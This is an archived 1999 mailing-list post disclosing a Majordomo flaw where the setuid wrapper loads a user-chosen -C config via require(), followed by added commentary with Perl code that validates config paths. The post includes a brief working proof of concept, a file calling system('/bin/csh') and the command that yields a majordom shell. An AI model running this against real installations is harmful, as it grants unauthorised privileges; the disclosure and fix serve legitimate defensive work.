From majordomo-workers-owner Fri Dec  3 13:13:01 1999
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-980720-1) id MAA00667; Fri, 3 Dec 1999 12:57:46 -0800 (PST)
Received: (mcb@localhost) by honor.greatcircle.com (8.8.5/Honor-980202-1) id MAA00657 for majordomo-workers@greatcircle.com; Fri, 3 Dec 1999 12:57:44 -0800 (PST)
Received: from tirin.openworld.co.uk (tirin.openworld.co.uk [194.207.107.233]) by honor.greatcircle.com (8.8.5/Honor-980202-1) with ESMTP id NAA13922 for ; Thu, 2 Dec 1999 13:55:01 -0800 (PST)
Received: from localhost (shevek@localhost) by tirin.openworld.co.uk (8.9.3/8.9.3) with ESMTP id WAA03319 for ; Thu, 2 Dec 1999 22:00:48 GMT
Date: Thu, 2 Dec 1999 22:00:48 +0000 (GMT)
From: Shevek
X-Sender: shevek@tirin.openworld.co.uk
To: majordomo-workers@greatcircle.com
Subject: $cf Security flaw
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: majordomo-workers-owner@GreatCircle.COM
Precedence: bulk

I can get majordomo privileges as a user.

    shevek@tirin ~$ cat foo.pl
    system("/bin/csh");
    shevek@tirin ~$ /usr/local/majordomo/wrapper majordomo -C /home/shevek/foo.pl
    %
    %whoami
    majordom

    root@tirin /usr/local/majordomo# ls -ld .
    drwxr-x--x   6 majordom daemon   1024 Dec  2 21:49 ./
    root@tirin /usr/local/majordomo# ls -l wrapper
    -rwsr-xr-x   1 root     daemon   6630 Jul 12 11:21 wrapper*

The lines in Majordomo (I found the bug by simple inspection; it's also in resend):

    $cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";

    while ($ARGV[0]) {                 # parse for config file or default list
        if ($ARGV[0] =~ /^-C$/i) {     # sendmail v8 clobbers case
            $cf = $ARGV[1];
            shift(@ARGV); shift(@ARGV);
        } elsif ($ARGV[0] eq "-l") {
            $deflist = $ARGV[1];
            shift(@ARGV); shift(@ARGV);
        } else {
            die "Unknown argument $ARGV[0]\n";
        }
    }

    if (! -r $cf) {
        die("$cf not readable; stopped");
    }

    require "$cf";

Am I doing something wrong, or is this a general flaw?
Can I simply disable all the possible methods of setting $cf without breaking other things? I haven't had time to inspect the system at any length; I just glanced at it.

I am not on any greatcircle mailing lists, so I would appreciate replies to my own address if there is discussion on this subject.

Majordomo version 1.94.4
Perl 5.005_03

Ta.

S.

--
Shevek
GM/CS/MU -d+ H+>++ s+: !g p2 au0 !a w+++ v-(---) C++++$ UL++++$ UB+ US+++$ UI+++$ P+>++++ L++++$ 3+ E--- N K !W(-----) M(-) !V -po+ Y+ t+ 5++ !j !R G' !tv b+++ D++ B--- e+ u+* h++ f? r-- n---- y?
Recent UH+>++ UO+ UC++ U?+++ UV++ and collecting.
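The root of the problem in the quoted snippet is that require "$cf" hands a path chosen by the (unprivileged) caller, via -C or MAJORDOMO_CF, to the Perl interpreter running as majordom under the setuid wrapper; -r only checks that the file is readable, not that anyone trustworthy wrote it. Below is an added example of the kind of check that belongs between the argument parsing and the require. It is not Majordomo's own code, and the whitelist of directories, the ownership rule (root or the effective user), the mode rule (no group/world write on the file or its directory) and the temporary-directory demonstration are all assumptions made here for illustration. In the script, require "$cf"; would become require check_config_path($cf);, and the check applies the same way whether $cf came from the environment or from -C.

```perl
#!/usr/bin/perl
# Added example (not Majordomo code): validate a caller-supplied config path
# before passing it to require() in a setuid context.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);
use File::Basename qw(basename);

# Directories a config file may be loaded from (assumed policy).
my @ALLOWED_DIRS = ('/etc', '/usr/local/majordomo');

# Dies unless $path is owned by root or the effective user and is not
# group- or world-writable; otherwise returns 1.
sub owned_and_tight {
    my ($path, $what) = @_;
    my @st = stat($path) or die "$path: cannot stat\n";
    my ($mode, $uid) = ($st[2] & 07777, $st[4]);
    die "$path: $what owned by uid $uid, not root or uid $>\n"
        unless $uid == 0 || $uid == $>;
    die sprintf("%s: %s mode %04o is group/world writable\n", $path, $what, $mode)
        if $mode & 022;
    return 1;
}

# Returns the canonical path of $cf if it is acceptable, else dies with the
# reason. Optional extra arguments override the allowed-directory list.
sub check_config_path {
    my ($cf, @allowed) = @_;
    @allowed = @ALLOWED_DIRS unless @allowed;
    die "empty config path\n" unless defined $cf && length $cf;

    # realpath() follows symlinks and collapses "..", so /etc/../home/x/foo.pl
    # or a symlink planted in a writable spot resolves to its true location.
    my $real = realpath($cf);
    die "$cf: cannot resolve path\n" unless defined $real;

    my (undef, $dir, undef) = File::Spec->splitpath($real);
    $dir = File::Spec->canonpath($dir);

    my $allowed_dir;
    for my $d (@allowed) {
        my $rd = realpath($d);
        if (defined $rd && $dir eq $rd) { $allowed_dir = $rd; last }
    }
    die "$cf resolves to $real, outside the allowed directories\n"
        unless defined $allowed_dir;

    # The directory must be as tight as the file, or an attacker could drop
    # or rename a file into it.
    owned_and_tight($allowed_dir, 'directory');
    owned_and_tight($real, 'file');
    die "$real: not a regular file\n" unless -f $real;
    return $real;
}

# Demonstration with constructed files; a temporary directory stands in for
# /etc, another for the attacker's home directory.
sub demo {
    my $conf_dir = tempdir(CLEANUP => 1);
    my $home     = tempdir(CLEANUP => 1);
    my %files = (
        "$conf_dir/majordomo.cf" => 0644,   # legitimate config
        "$conf_dir/loose.cf"     => 0666,   # world-writable: rejected
        "$home/foo.pl"           => 0644,   # caller-supplied: rejected
    );
    for my $f (sort keys %files) {
        open my $fh, '>', $f or die "$f: $!";
        print $fh "1;\n";
        close $fh;
        chmod $files{$f}, $f;
    }
    # The legitimate file spelled with a ".." hop, to show normalisation.
    my $twisted = "$conf_dir/../" . basename($conf_dir) . "/majordomo.cf";

    for my $cf ("$conf_dir/majordomo.cf", $twisted, "$conf_dir/loose.cf", "$home/foo.pl") {
        my $real = eval { check_config_path($cf, $conf_dir) };
        if (defined $real) { print "OK        $cf -> require $real\n" }
        else { chomp(my $err = $@); print "REJECTED  $err\n" }
    }
}

demo();
```

The stricter alternative, if -C is only ever needed for testing, is to refuse it and MAJORDOMO_CF outright when the real and effective uids differ ($< != $>), which is exactly the setuid case the wrapper creates; the path check above is for installations that still need a per-list config override.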